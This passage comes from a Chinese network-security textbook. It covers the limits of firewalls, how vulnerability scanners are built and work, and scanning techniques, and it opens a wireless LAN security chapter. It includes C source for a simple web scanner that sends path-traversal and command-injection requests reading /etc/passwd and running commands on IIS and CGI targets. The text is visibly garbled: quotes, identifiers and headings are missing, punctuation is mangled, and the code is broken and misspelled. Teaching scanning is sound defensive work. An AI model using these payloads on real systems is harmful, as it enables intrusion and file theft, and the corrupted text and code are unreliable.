【正文】 配置引起的安全威脅。防火墻的各種策略，也是在該攻擊 方式經(jīng)過專家分析后給出其特征進而設(shè)置的。 如果世界上新發(fā)現(xiàn)某個主機 （ 4）防火墻不能 防止可接觸的人為或自然的破壞。防火墻是一個安全設(shè)備，但防火墻本身必須存在于一個安全的位置。 （５）防火墻無法解決 TCP/IP 等協(xié)議的漏洞。防火墻本身就是基于 TCP/IP 等協(xié)議來實現(xiàn)的，就無法解決 TCP/IP 操作的漏洞。比如利用 DOS 或 DDOS 攻擊。 （６）防火墻對服務(wù)器合法開放的端口的攻擊大多無法阻止。例如 ，利用開放了3389 端口取得沒打過 XP 補丁的 Windows 2021 的超級權(quán)限，利用 ASP 程序進行腳本攻擊等。由于其行為在防火墻一級看來是“合理”和“合法”的，因此就被簡單地放行了。 （ 7）防火墻不能防止受病毒感染的文件的傳輸。防火墻本身并不具有備查殺病毒的功能 ，即使集成了第三方的防病毒軟件，也沒有一種軟件可以查殺所有的病毒。 （ 8）防火墻不能防止數(shù)據(jù)驅(qū)動式的攻擊。當(dāng)有些表面看來無害的數(shù)據(jù)郵寄或拷貝到內(nèi)部網(wǎng)的主機上并被執(zhí)行時，可能會發(fā)生數(shù)據(jù)驅(qū)動式的攻擊。 （ 9）防火墻不能防止本身安全漏洞的威脅。防火墻保護別 人有時卻無法保護自己，因為目前還沒有廠商絕對保證防火墻不會存在安全漏洞。 總之，隨著互聯(lián)網(wǎng)的日趨普及，互聯(lián)網(wǎng)上的犯罪活動也越來越多，特別是互聯(lián)網(wǎng)大范圍的開放以及金融 領(lǐng)域網(wǎng)絡(luò)的接入，使得越來越多的系統(tǒng)遭到入侵攻擊的威脅。但是，不管入侵者是從外部還是從內(nèi)部攻擊某一網(wǎng)絡(luò)系統(tǒng)，攻擊機會都是通過挖掘操作系統(tǒng)和應(yīng)用服務(wù)程序的弱點或者缺陷來實現(xiàn)的，例如 1988 年的“蠕蟲事件”。如果用戶能夠根據(jù)具體的應(yīng)用環(huán)境，盡可能早地通過網(wǎng)絡(luò)掃描來發(fā)現(xiàn)這些漏洞，并及時采取適當(dāng)?shù)奶幚泶胧┻M行修補，就可以有效地阻止入侵事件的發(fā)生。因此 ，在網(wǎng)絡(luò)系統(tǒng)建設(shè)中采用漏洞掃描技術(shù)是非常必要的。 漏洞掃描系統(tǒng)組成可以用 漏洞掃描系統(tǒng)各組成部分的功能說明如下： （ 1） 漏洞數(shù)據(jù)庫模塊：漏洞數(shù)據(jù)庫包含了各種操作系統(tǒng)的各種漏洞信息，以及如何檢測漏洞的指令。由于新的漏洞會不斷出現(xiàn)，該數(shù)據(jù)庫需要經(jīng)常更新，以便能夠檢測到新發(fā)現(xiàn)的漏洞。 （ 2） 用戶配置控制臺模塊：用戶配置控制臺與安全管理員進行交互，用來設(shè)置要掃描的目標(biāo)系統(tǒng)以及掃描哪些漏洞。 （ 3） 掃描 引擎模塊：掃描引擎是掃描器的主要部件。根據(jù) 用戶配置控制臺部分的相關(guān)設(shè)置，掃描引擎組裝好相應(yīng)的數(shù)據(jù)包，發(fā)送到目標(biāo)系統(tǒng)，將接收到的目標(biāo)系統(tǒng)的應(yīng)答數(shù)據(jù)包與漏洞數(shù)據(jù)庫中的漏洞特征進行比較，來判斷所選擇的漏洞是否存在。 （ 4） 當(dāng)前活動的掃描知識庫模塊：通過查看內(nèi)存中的配置信息，該模塊監(jiān)控當(dāng)前活動的掃描，將要掃描漏洞的相關(guān)信息提供給掃描引擎，同時還接收掃描引擎返回的掃描結(jié)果。 （ 5） 結(jié)果存儲器和報告生成工具：就是利用當(dāng)前活動掃描知識庫中存儲的掃描結(jié)果，生成掃描報告。掃描報告將告訴用戶配置控制臺設(shè)置了哪些選項，根據(jù)這些設(shè)置，掃描結(jié)束后，在哪些目標(biāo)系統(tǒng)上發(fā)現(xiàn)了哪些漏洞。 網(wǎng)絡(luò)漏洞掃描器 一般情況可以將漏洞掃描器分為兩種類型，主機漏洞掃描器（ Host Scanner）和網(wǎng)絡(luò)漏洞掃描器（ Network Scanner）。 主機漏洞掃描器是指在系統(tǒng)本地運行檢測系統(tǒng)漏洞的程序，網(wǎng)絡(luò)漏洞掃描器是指基于 Inter 遠程檢測目標(biāo)網(wǎng)絡(luò)和主機系統(tǒng)漏洞的程序。網(wǎng)絡(luò)漏洞掃描器通過遠程檢測目標(biāo)主機 TCP/IP 不同端口的服務(wù)，記錄目標(biāo)給予的回答。通過這種方法，可以搜集到很多目標(biāo)主機的各種信息，例如是否能用匿名登錄，是否有可寫的 FTP 目錄等。在獲得目標(biāo)主機 TCP/IP 端口和其對應(yīng)的網(wǎng)絡(luò)訪問服務(wù)的相關(guān)信息后，與網(wǎng)絡(luò)漏洞掃描系統(tǒng)提供的漏洞庫進行匹配，如果滿足匹配條件，則視為漏洞存在。在匹配原理上，網(wǎng)絡(luò)漏洞掃描器可以采用的是基于規(guī)則的匹配技術(shù)，即根據(jù)安全專家對網(wǎng)絡(luò)系統(tǒng)安全漏洞、黑客攻擊案例的分析和系統(tǒng)管理員關(guān)于網(wǎng)絡(luò)系統(tǒng)安全配置的實際經(jīng)驗，形成一套標(biāo)準(zhǔn)的系統(tǒng)漏洞庫，然后在此基礎(chǔ)之上構(gòu)成相應(yīng)的匹配規(guī)則，由程序自動進行系統(tǒng)漏洞掃描的分析工作。 掃描引擎 漏洞數(shù)據(jù)庫 當(dāng)前活動的掃描知識庫 用戶配置控制的 結(jié)果存儲器和報告生成工具 1．漏洞掃描器的掃描工作原理 網(wǎng)絡(luò)漏洞掃描器的掃描工作原理是，首先探測目標(biāo)系統(tǒng)的活動主機，對活動主機進行端口掃描，確定系統(tǒng)開放的端口，同時根據(jù)協(xié)議指紋技術(shù)識別出主機的操 作系統(tǒng)類型。然后掃描器對開放的端口進行網(wǎng)絡(luò)服務(wù)類型的識別，確定其提供的網(wǎng)絡(luò)服務(wù)。漏洞掃描器根據(jù)目標(biāo)系統(tǒng)的的操作系統(tǒng)平臺和提供的網(wǎng)絡(luò)服務(wù)，調(diào)用漏洞資料庫中已知的各種漏洞進行逐一檢測，通過對探測響應(yīng)數(shù)據(jù)包的分析判斷是否存在已知安全漏洞。目標(biāo)可以是工作站、服務(wù)器、交換機、數(shù)據(jù)庫應(yīng)用等各種對象。掃描結(jié)果可以給用戶提供周密可靠的安全性分析報告，是提高網(wǎng)絡(luò)安全整體水平的重要依據(jù)。 掃描器并不是一個直接的攻擊網(wǎng)絡(luò)漏洞的程序，它僅僅能幫助用戶發(fā)現(xiàn)目標(biāo)機存在的某些弱點。一個好的掃描器能對它得到的數(shù)據(jù)進行分析，幫助用戶查找目標(biāo) 主機的漏洞。但它不會提供進入一個系統(tǒng)的詳細步驟。例如，下面是一個簡單的漏洞掃描的源代碼，該掃描程序可以完成以下 4 項工作： ●連接目標(biāo)主機 Server； ●向目標(biāo)主機發(fā)送 GET 請求； ●接收目標(biāo)返回數(shù)據(jù)； ●根據(jù)返回數(shù)據(jù)判斷文件是否存在。 /* 端口掃描器 源代碼 */ /* */ /*******************************************/ include /*引用頭文件 */ include include int main(int argc,char *argv[]) /* UNIS 和 Linux 中的標(biāo)準(zhǔn)寫法 */ { if(argc!=2){ printf(Useage : scan [IP address]\n)。 return(1)。 } struct sockaddr_in bo。 /*互聯(lián)網(wǎng)套接字結(jié)構(gòu) */ struct hostent *he。 /*主機信息類型 */ MINDATA minData。 int i。 WORD wVersionRequested。 SOCKET sock。 char buff[1024]。 /*緩沖區(qū) */ char *ex[10]。 ex[1]=GET /../../../../etc/passwd HTTP/\n\n。 ex[2]=GET/scripts/..%c1%1c../winnt/system32/?/c+dir+c:\HTTP/\n\n。 ex[3]=GET /\n\n。 ex[4]=GET /cgibin/?/../../../../etc/motd HTTP/ \n\n。 ex[5]=GET /cgibin/testcgi?\helpamp。0a/bin/cat%20/etc/passwd HTTP/ \n\n。 ex[6]=GET /cgibin/testcgi?* HTTP/\n\n。 char *fmsg=HTTP/ 200 OK。 wVersionRequested = MAKEWORD( 1, 1 )。 if (WSAStartup(wVersionRequested , amp。minData)){ printf(Winsock Initialization failed.\n)。 exit(1)。 } if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){ printf(Can not create socket.\n)。 exit(1)。 } sock = socket(AF_INET,SOCK_STREAM,0)。 /*創(chuàng)建用于監(jiān)聽的套接字 */ = AF_INET。 /*設(shè)置地址結(jié)構(gòu)遵循 TCP/IP 協(xié)議 */ = htons(80)。 = i_addr(argv[1])。 if ((he=gethostbyname(argv[1]))!=NULL){ memcpy((char *)amp。,heh_addr,heh_length)。 } else{ if((=i_addr(argv[1]))==1){ WSACleanup()。 exit(1)。 } } for (i=1 。 i7。 i++) { if (connectsock,(struct sockaddr*)amp。bo,sizeof(bo))==0){ send(sock,ex[i],strlen(ex[i]),0)。 recv(sock,buff,sizeof(buff),0)。 if(strstr(buff,fmsg)!=NULL){ printf(\nFound :%s/n, ex[i])。 } } colsesocket(sock)。 /*關(guān)閉監(jiān)聽套接字 */ WASCleanup()。 return(1)。 } } 提示： 編寫漏洞掃描器探查遠程服務(wù)器上可能存在的具有安全隱患的文件是否存在時，通常用 socket 建立過程，使用 80 端口，對這個端口發(fā)送一個 GET 文件的請求服務(wù)器接收到請求會返回文件內(nèi)容，如果文件不存在則返回一個錯誤提示，通過接收返回內(nèi)容可以判斷文件是否存在。發(fā)送和接收數(shù)據(jù)需要使用函數(shù) send() 和 recv()，其中對流中存在的字符串進行判斷需要使用函數(shù) strstr()。 掃描器應(yīng)該有三項能力：發(fā)現(xiàn)一個主機的網(wǎng)絡(luò)的能力；發(fā)現(xiàn)什么服務(wù)正在主機上運行的能力；發(fā)現(xiàn)服務(wù)漏洞的能力。 漏洞掃描通常采用兩種策略，第一種是被動式策略，第二種是主動式策略。所謂被動式策略就是基于主機之上，對系統(tǒng)中不合適的設(shè)置、脆弱的口令以及其他與安全規(guī)則抵觸的對象進行檢查 。而主動式策略是基于網(wǎng)絡(luò)的，它通過執(zhí)行一些腳本文件模擬對系統(tǒng)進行攻擊的行為并記錄系統(tǒng)的反應(yīng)，從而發(fā)現(xiàn)其中的漏洞。利用被動式策略的掃描稱為系統(tǒng)安全掃描，利用主動式的策略掃描稱為網(wǎng)絡(luò)安全掃描。 漏洞 掃描歸納起來主要有 4 種技術(shù)： 。它采用被動的、非破壞性的辦法檢查應(yīng)用軟件包的設(shè)置，發(fā)現(xiàn)安全漏洞。 。它采用被動的、非破壞性的辦法對系統(tǒng)進行檢測。通常，它涉及到系統(tǒng)的內(nèi)核、文件的屬性、操作系統(tǒng)的補丁等。這種技術(shù)還包括口令解密、把一些簡單的口令剔除。因此，這種技術(shù)可以非常準(zhǔn)確地定位系統(tǒng)的問題，發(fā)現(xiàn)系統(tǒng)的漏洞。它的缺點是與平臺相關(guān)，升級復(fù)雜。 。它采用被動的、非破壞性的辦法檢查系統(tǒng)屬性和文件屬性，如數(shù)據(jù)庫、注冊號等。通過消息文摘算法，對文件的 加密數(shù)進行檢驗。這種技術(shù)的實現(xiàn)是運行在一個閉環(huán)上，不斷地處理文件、系統(tǒng)目標(biāo)、系統(tǒng)目標(biāo)屬性，然后產(chǎn)生檢驗數(shù)，把這些檢驗數(shù)同原來的檢驗數(shù)相比較。一旦發(fā)現(xiàn)改變就通知管理員。 4. 基于網(wǎng)絡(luò)的檢測技術(shù)。它采用積極的、非破壞性的辦法來檢驗系統(tǒng)是否有可能被攻擊崩潰。它利用了一系列的腳本模擬對系統(tǒng)進行攻擊的行為，然后對結(jié)果進行分析。它還針對已知的網(wǎng)絡(luò)漏洞進行檢驗。網(wǎng)絡(luò)檢測技術(shù)常被用來進行穿透實驗和安全審記。這種技術(shù)可以發(fā)現(xiàn)一系列平臺的漏洞，也容易安裝。但是，它可能會影響網(wǎng)絡(luò)的性能。 第 七 章無線網(wǎng)絡(luò)安全實戰(zhàn) 近 年來，隨著筆記本電腦和個人數(shù)字代理（ PDA）以及家電數(shù)字化等技術(shù)的發(fā)展，人們利用信息技術(shù)進行通信聯(lián)系和信息交流的空間和靈活性不斷拓展。無線網(wǎng)絡(luò) 成為技術(shù)發(fā)展和社會應(yīng)用的新寵，受到全社會的普遍歡迎，同時也成為網(wǎng)絡(luò)發(fā)展商們爭相搶占的新領(lǐng)域 。 無線局域網(wǎng)安全現(xiàn)狀與安全威脅 計算機通信網(wǎng)絡(luò)隨著互聯(lián)網(wǎng)技術(shù)的飛速發(fā)展而發(fā)展 ,從傳統(tǒng)的有線網(wǎng)絡(luò)發(fā)展到今天的無線網(wǎng)絡(luò) ,作為無線網(wǎng)絡(luò)主要網(wǎng)絡(luò)之一的無線局域網(wǎng) WLAN(Wireless Local Network),滿足了人們實現(xiàn)移動辦公的夢想，為用戶創(chuàng)造了一個豐富多彩的自由天空，讓人能夠真正體會到網(wǎng)絡(luò)無處不在的奇妙感覺。 無線局域網(wǎng)的概述 的概念 WLAN 是利用無線通信技術(shù)在一定的局部范圍內(nèi)建立的網(wǎng)絡(luò)，是計算機網(wǎng)絡(luò)與無線通信技術(shù)相結(jié)合的產(chǎn)物，它以無線多址信道作為傳輸媒介，提供傳統(tǒng)有線局域網(wǎng) LAN（ LocalAreaNetwork）的功能，能夠使用戶真正實現(xiàn)隨時、隨地、隨意的寬帶網(wǎng)絡(luò)接入。 2． WLAN 的特點 WLAN 開始是作為有線局域網(wǎng)絡(luò)地延伸而存在的，各團體、企事業(yè)單位廣泛地采用了 WLAN 技術(shù)來構(gòu)建其辦公網(wǎng)絡(luò)。但隨著應(yīng)用的進一步發(fā)展， WLAN 正逐漸從傳統(tǒng)意義上的局域網(wǎng)技術(shù)發(fā)展成為 公共無線局域網(wǎng) ，成為國際互聯(lián)網(wǎng)INTERNET 寬帶接入手段。 主要是因為無線局域網(wǎng)具有如下特點： （ 1）具有高移動性，通信范圍不受環(huán)境條件的限制，拓寬了網(wǎng)絡(luò)傳輸范圍。 （ 2）安全性能強，無線局域網(wǎng)采取網(wǎng)絡(luò)隔離及網(wǎng)絡(luò)認證措施；無線局域網(wǎng)設(shè)置有嚴(yán)密的用戶口令及認證措施，防止非法用戶入侵；無線局域網(wǎng)設(shè)置附加的第三份數(shù)據(jù)加密方案，即使信號被盜聽也難以理解其中的內(nèi)容。對于有線局域網(wǎng)中的諸多安全問題，在無線局域網(wǎng)中基本上可以避免。 （ 3）擴展能力強，在已有無線